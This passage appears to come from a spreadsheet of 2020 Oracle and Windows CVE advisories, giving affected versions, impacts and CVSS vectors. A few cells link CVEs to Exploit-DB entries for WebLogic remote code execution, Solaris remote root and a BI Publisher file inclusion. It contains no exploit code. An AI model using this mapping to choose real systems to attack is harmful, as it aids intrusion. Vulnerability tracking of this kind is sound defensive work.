    <t>Vulnerability in the Oracle CRM Technical Foundation product of Oracle E-Business Suite (component: Preferences). Supported versions that are affected are 12.2.3 - 12.2.10. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle CRM Technical Foundation. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle CRM Technical Foundation accessible data as well as unauthorized access to critical data or complete access to all Oracle CRM Technical Foundation accessible data. CVSS 3.1 Base Score 6.5 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14824</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Financial Services Analytical Applications Infrastructure product of Oracle Financial Services Applications (component: Infrastructure). Supported versions that are affected are 8.0.6-8.1.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Financial Services Analytical Applications Infrastructure. While the vulnerability is in Oracle Financial Services Analytical Applications Infrastructure, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle Financial Services Analytical Applications Infrastructure. CVSS 3.1 Base Score 8.6 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H).</t>
  </si>
  <si>
    <t>CVE-2020-14825</t>
  </si>
  <si>
    <t>CVE-2020-14826</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Applications Manager product of Oracle E-Business Suite (component: SQL Extensions). Supported versions that are affected are 12.1.3 and 12.2.3 - 12.2.10. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Applications Manager. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle Applications Manager accessible data. CVSS 3.1 Base Score 5.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14827</t>
  </si>
  <si>
    <t>Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Security: LDAP Auth). Supported versions that are affected are 5.7.31 and prior and 8.0.21 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all MySQL Server accessible data. CVSS 3.1 Base Score 6.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14828</t>
  </si>
  <si>
    <t>Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: DML). Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in takeover of MySQL Server. CVSS 3.1 Base Score 7.2 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H).</t>
  </si>
  <si>
    <t>CVE-2020-14829</t>
  </si>
  <si>
    <t>CVE-2020-1483</t>
  </si>
  <si>
    <t>CVE-2020-14830</t>
  </si>
  <si>
    <t>Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.21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0-14831</t>
  </si>
  <si>
    <t>CVE-2020-14832</t>
  </si>
  <si>
    <t>Vulnerability in the PeopleSoft Enterprise PeopleTools product of Oracle PeopleSoft (component: Integration Broker). Supported versions that are affected are 8.56, 8.57 and 8.58.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0-14833</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Trade Management product of Oracle E-Business Suite (component: User Interface). Supported versions that are affected are 12.1.1 - 12.1.3 and 12.2.3 - 12.2.10. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Trade Management. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Trade Management, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Trade Management accessible data as well as unauthorized update, insert or delete access to some of Oracle Trade Management accessible data. CVSS 3.1 Base Score 8.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14834</t>
  </si>
  <si>
    <t>CVE-2020-14835</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Marketing product of Oracle E-Business Suite (component: Marketing Administration). Supported versions that are affected are 12.1.1 - 12.1.3.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access to critical data or complete access to all Oracle Marketing accessible data as well as unauthorized update, insert or delete access to some of Oracle Marketing accessible data. CVSS 3.1 Base Score 8.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14836</t>
  </si>
  <si>
    <t>CVE-2020-14837</t>
  </si>
  <si>
    <t>CVE-2020-14838</t>
  </si>
  <si>
    <t>Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Security: Privileges). Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized read access to a subset of MySQL Server accessible data. CVSS 3.1 Base Score 4.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14839</t>
  </si>
  <si>
    <t>CVE-2020-1484</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows Work Folders Service improperly handles memory.To exploit this vulnerability, an attacker would first have to gain execution on the victim system, aka 'Windows Work Folders Service Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1470, CVE-2020-1516.</t>
  </si>
  <si>
    <t>CVE-2020-14840</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Application Object Library product of Oracle E-Business Suite (component: Diagnostics). Supported versions that are affected are 12.1.3 and 12.2.3 - 12.2.10. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Application Object Library. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Application Object Library, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Application Object Library accessible data. CVSS 3.1 Base Score 4.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14841</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via IIOP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).</t>
  </si>
  <si>
    <t>CVE-2020-14842</t>
  </si>
  <si>
    <t>Vulnerability in the BI Publisher product of Oracle Fusion Middleware (component: BI Publisher Security). Supported versions that are affected are 5.5.0.0.0, 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise BI Publisher. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in BI Publisher, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all BI Publisher accessible data as well as unauthorized update, insert or delete access to some of BI Publisher accessible data. CVSS 3.1 Base Score 8.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14843</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Business Intelligence Enterprise Edition product of Oracle Fusion Middleware (component: Analytics Actions). Supported versions that are affected are 5.5.0.0.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable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update, insert or delete access to some of Oracle Business Intelligence Enterprise Edition accessible data as well as unauthorized read access to a subset of Oracle Business Intelligence Enterprise Edition accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Business Intelligence Enterprise Edition. CVSS 3.1 Base Score 7.1 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L).</t>
  </si>
  <si>
    <t>CVE-2020-14844</t>
  </si>
  <si>
    <t>CVE-2020-14845</t>
  </si>
  <si>
    <t>CVE-2020-14846</t>
  </si>
  <si>
    <t>CVE-2020-14847</t>
  </si>
  <si>
    <t>Vulnerability in the PeopleSoft Enterprise PeopleTools product of Oracle PeopleSoft (component: Query). Supported versions that are affected are 8.56, 8.57 and 8.58. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise PeopleSoft Enterprise PeopleTools. Successful attacks of this vulnerability can result in unauthorized read access to a subset of PeopleSoft Enterprise PeopleTools accessible data. CVSS 3.1 Base Score 2.7 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14848</t>
  </si>
  <si>
    <t>CVE-2020-14849</t>
  </si>
  <si>
    <t>CVE-2020-1485</t>
  </si>
  <si>
    <t>An information disclosure vulnerability exists when the Windows Image Acquisition (WIA) Service improperly discloses contents of its memory, aka 'Windows Image Acquisition Service Information Disclosure Vulnerability'. This CVE ID is unique from CVE-2020-1474.</t>
  </si>
  <si>
    <t>CVE-2020-14850</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle CRM Technical Foundation product of Oracle E-Business Suite (component: Flex Fields). Supported versions that are affected are 12.1.3 and 12.2.3 - 12.2.10.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1 Base Score 8.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14851</t>
  </si>
  <si>
    <t>CVE-2020-14852</t>
  </si>
  <si>
    <t>Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Charsets). Supported versions that are affected are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853</t>
  </si>
  <si>
    <t>Vulnerability in the MySQL Cluster product of Oracle MySQL (component: Cluster: NDBCluster Plugin). Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Cluster. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of MySQL Cluster accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of MySQL Cluster. CVSS 3.1 Base Score 4.6 (Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:L).</t>
  </si>
  <si>
    <t>CVE-2020-14854</t>
  </si>
  <si>
    <t>Vulnerability in the Hyperion Infrastructure Technology product of Oracle Hyperion (component: UI and Visualization). The supported version that is affected is 11.1.2.4. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Hyperion Infrastructure Technology. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Hyperion Infrastructure Technology accessible data as well as unauthorized access to critical data or complete access to all Hyperion Infrastructure Technology accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N).</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N</t>
  </si>
  <si>
    <t>CVE-2020-14855</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Universal Work Queue product of Oracle E-Business Suite (component: Work Provider Administration). The supported version that is affected is 12.1.3. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Universal Work Queue. Successful attacks of this vulnerability can result in takeover of Oracle Universal Work Queue. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).</t>
  </si>
  <si>
    <t>CVE-2020-14856</t>
  </si>
  <si>
    <t>CVE-2020-14857</t>
  </si>
  <si>
    <t>CVE-2020-14858</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Hospitality OPERA 5 Property Services product of Oracle Hospitality Applications (component: Logging). Supported versions that are affected are 5.5 and 5.6. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle Hospitality OPERA 5 Property Services. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in takeover of Oracle Hospitality OPERA 5 Property Services. CVSS 3.1 Base Score 6.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H).</t>
  </si>
  <si>
    <t>CVE-2020-14859</t>
  </si>
  <si>
    <t>CVE-2020-1486</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory, aka 'Windows Kernel Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1417, CVE-2020-1566.</t>
  </si>
  <si>
    <t>exploits/linux/webapps/48964.txt</t>
  </si>
  <si>
    <t>Oracle Business Intelligence Enterprise Edition 5.5.0.0.0 / 12.2.1.3.0 / 12.2.1.4.0 - 'getPreviewImage' Directory Traversal/Local File Inclusion</t>
  </si>
  <si>
    <t>CVE-2020-14860</t>
  </si>
  <si>
    <t>Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Security: Roles). Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of MySQL Server accessible data. CVSS 3.1 Base Score 2.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14861</t>
  </si>
  <si>
    <t>CVE-2020-14862</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Universal Work Queue product of Oracle E-Business Suite (component: Internal Operations). Supported versions that are affected are 12.2.3 - 12.2.9. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Universal Work Queue. Successful attacks of this vulnerability can result in takeover of Oracle Universal Work Queue. CVSS 3.1 Base Score 8.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H).</t>
  </si>
  <si>
    <t>CVE-2020-14863</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle One-to-One Fulfillment product of Oracle E-Business Suite (component: Print Server). Supported versions that are affected are 12.1.1 - 12.1.3.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access to critical data or complete access to all Oracle One-to-One Fulfillment accessible data as well as unauthorized update, insert or delete access to some of Oracle One-to-One Fulfillment accessible data. CVSS 3.1 Base Score 8.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14864</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Business Intelligence Enterprise Edition product of Oracle Fusion Middleware (component: Installation). Supported versions that are affected are 5.5.0.0.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Business Intelligence Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Business Intelligence Enterprise Edition accessible data. CVSS 3.1 Base Score 7.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14865</t>
  </si>
  <si>
    <t>Vulnerability in the PeopleSoft Enterprise SCM eSupplier Connection product of Oracle PeopleSoft (component: eSupplier Connection). The supported version that is affected is 9.2. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise PeopleSoft Enterprise SCM eSupplier Connection. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all PeopleSoft Enterprise SCM eSupplier Connection accessible data as well as unauthorized access to critical data or complete access to all PeopleSoft Enterprise SCM eSupplier Connection accessible data. CVSS 3.1 Base Score 8.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14866</t>
  </si>
  <si>
    <t>CVE-2020-14867</t>
  </si>
  <si>
    <t>Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: DDL). Supported versions that are affected are 5.6.49 and prior, 5.7.31 and prior and 8.0.21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0-14868</t>
  </si>
  <si>
    <t>CVE-2020-14869</t>
  </si>
  <si>
    <t>Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Security: LDAP Auth). Supported versions that are affected are 5.7.31 and prior and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87</t>
  </si>
  <si>
    <t>exploits/solaris/remote/50039.py</t>
  </si>
  <si>
    <t>Solaris SunSSH 11.0 x86 - libpam Remote Root (3)</t>
  </si>
  <si>
    <t>CVE-2020-14870</t>
  </si>
  <si>
    <t>Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: X Plugin). Supported versions that are affected are 8.0.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0-14871</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Solaris product of Oracle Systems (component: Pluggable authentication module). Supported versions that are affected are 10 and 11. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Solaris. While the vulnerability is in Oracle Solaris, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Oracle Solaris. Note: This CVE is not exploitable for Solaris 11.1 and later releases, and ZFSSA 8.7 and later releases, thus the CVSS Base Score is 0.0. CVSS 3.1 Base Score 10.0 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H).</t>
  </si>
  <si>
    <t>CVE-2020-14872</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). The supported version that is affected is Prior to 6.1.16.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1 Base Score 8.2 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H).</t>
  </si>
  <si>
    <t>CVE-2020-14873</t>
  </si>
  <si>
    <t>Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Logging). Supported versions that are affected are 8.0.21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4 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H).</t>
  </si>
  <si>
    <t>CVE-2020-14874</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Cloud Infrastructure Identity and Access Management product of Oracle Cloud Services. Easily exploitable vulnerability allows high privileged attacker with network access to compromise Oracle Cloud Infrastructure Identity and Access Management. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Cloud Infrastructure Identity and Access Management accessible data as well as unauthorized read access to a subset of Oracle Cloud Infrastructure Identity and Access Management accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Cloud Infrastructure Identity and Access Management.</t>
  </si>
  <si>
    <t>CVE-2020-14875</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Marketing product of Oracle E-Business Suite (component: Marketing Administration). Supported versions that are affected are 12.1.1 - 12.1.3 and 12.2.3 - 12.2.10. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Marketing. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Marketing accessible data as well as unauthorized access to critical data or complete access to all Oracle Marketing accessible data. CVSS 3.1 Base Score 9.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14876</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Trade Management product of Oracle E-Business Suite (component: User Interface). Supported versions that are affected are 12.1.1 - 12.1.3 and 12.2.3 - 12.2.10. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Trade Management. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Trade Management accessible data as well as unauthorized access to critical data or complete access to all Oracle Trade Management accessible data. CVSS 3.1 Base Score 9.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14877</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Hospitality OPERA 5 Property Services product of Oracle Hospitality Applications (component: Logging). Supported versions that are affected are 5.5 and 5.6. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle Hospitality OPERA 5 Property Services. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Hospitality OPERA 5 Property Services accessible data as well as unauthorized access to critical data or complete access to all Oracle Hospitality OPERA 5 Property Services accessible data. CVSS 3.1 Base Score 6.5 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14878</t>
  </si>
  <si>
    <t>Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Security: LDAP Auth). Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows low privileged attacker with access to the physical communication segment attached to the hardware where the MySQL Server executes to compromise MySQL Server. Successful attacks of this vulnerability can result in takeover of MySQL Server. CVSS 3.1 Base Score 8.0 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H).</t>
  </si>
  <si>
    <t>CVE-2020-14879</t>
  </si>
  <si>
    <t>Vulnerability in the BI Publisher product of Oracle Fusion Middleware (component: E-Business Suite - XDO). Supported versions that are affected are 5.5.0.0.0, 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise BI Publisher. While the vulnerability is in BI Publisher, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all BI Publisher accessible data as well as unauthorized update, insert or delete access to some of BI Publisher accessible data. CVSS 3.1 Base Score 8.5 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-1488</t>
  </si>
  <si>
    <t>exploits/java/webapps/49479.py</t>
  </si>
  <si>
    <t>Oracle WebLogic Server 12.2.1.0 - RCE (Unauthenticated)</t>
  </si>
  <si>
    <t>2021-01-26</t>
  </si>
  <si>
    <t>CVE-2020-14880</t>
  </si>
  <si>
    <t>CVE-2020-14881</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). The supported version that is affected is Prior to 6.1.16.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1 Base Score 6.0 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14882</t>
  </si>
  <si>
    <t>CVE-2020-14883</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Console). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.1 Base Score 7.2 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H).</t>
  </si>
  <si>
    <t>CVE-2020-14884</t>
  </si>
  <si>
    <t>CVE-2020-14885</t>
  </si>
  <si>
    <t>CVE-2020-14886</t>
  </si>
  <si>
    <t>CVE-2020-14887</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle FLEXCUBE Universal Banking product of Oracle Financial Services Applications (component: Infrastructure). Supported versions that are affected are 12.3.0 and 14.0.0-14.4.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle FLEXCUBE Universal Banking. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle FLEXCUBE Universal Banking accessible data. CVSS 3.1 Base Score 6.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14888</t>
  </si>
  <si>
    <t>CVE-2020-14889</t>
  </si>
  <si>
    <t>CVE-2020-1489</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows CSC Service improperly handles memory.To exploit this vulnerability, an attacker would first have to gain execution on the victim system, aka 'Windows CSC Service Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1513.</t>
  </si>
  <si>
    <t>CVE-2020-14890</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle FLEXCUBE Direct Banking product of Oracle Financial Services Applications (component: Pre Login). Supported versions that are affected are 12.0.1, 12.0.2 and 12.0.3. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle FLEXCUBE Direct Banking. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle FLEXCUBE Direct Banking accessible data. CVSS 3.1 Base Score 6.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14891</t>
  </si>
  <si>
    <t>CVE-2020-14892</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). The supported version that is affected is Prior to 6.1.16. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle VM VirtualBox. CVSS 3.1 Base Score 5.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).</t>
  </si>
  <si>
    <t>CVE-2020-14893</t>
  </si>
  <si>
    <t>CVE-2020-14894</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Banking Corporate Lending product of Oracle Financial Services Applications (component: Core). Supported versions that are affected are 12.3.0 and 14.0.0-14.4.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Banking Corporate Lending. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Banking Corporate Lending accessible data. CVSS 3.1 Base Score 6.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14895</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Utilities Framework product of Oracle Utilities Applications (component: System Wide). Supported versions that are affected are 2.2.0.0.0, 4.2.0.2.0, 4.2.0.3.0, 4.3.0.1.0 - 4.3.0.6.0, 4.4.0.0.0 and 4.4.0.2.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Utilities Framework. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Utilities Framework accessible data as well as unauthorized read access to a subset of Oracle Utilities Framework accessible data. CVSS 3.1 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14896</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Banking Payments product of Oracle Financial Services Applications (component: Core). Supported versions that are affected are 14.1.0-14.4.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Banking Payments. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Banking Payments accessible data. CVSS 3.1 Base Score 6.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14897</t>
  </si>
  <si>
    <t>CVE-2020-14898</t>
  </si>
  <si>
